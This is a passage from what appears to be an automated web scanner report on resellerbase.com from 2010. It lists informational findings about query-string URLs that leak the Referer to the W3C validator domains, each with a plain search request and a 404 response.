Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/26/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.162. http://www.resellerbase.com/detail/28/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/28/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/28/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/28/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/28/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.163. http://www.resellerbase.com/detail/29/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/29/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/29/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/mediaplazza-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.164. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/29/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.165. http://www.resellerbase.com/detail/29/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/29/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/29/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.166. http://www.resellerbase.com/detail/29/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/29/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/29/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.167. http://www.resellerbase.com/detail/29/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/29/themes/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/29/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.168. http://www.resellerbase.com/detail/30/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/30/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/30/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.169. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/30/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.170. http://www.resellerbase.com/detail/30/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/30/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/30/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.171. http://www.resellerbase.com/detail/30/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/30/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/30/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.172. http://www.resellerbase.com/detail/30/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/30/themes/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/30/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.173. http://www.resellerbase.com/detail/31/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/31/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/31/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/camsense-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.174. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/31/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.175. http://www.resellerbase.com/detail/31/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/31/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/31/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

6.176. http://www.resellerbase.com/detail/31/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/31/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/31/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.177. http://www.resellerbase.com/detail/31/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/31/themes/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/31/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.178. http://www.resellerbase.com/detail/32/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/32/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/32/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/32/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/32/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.179. http://www.resellerbase.com/detail/33/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/33/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/33/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

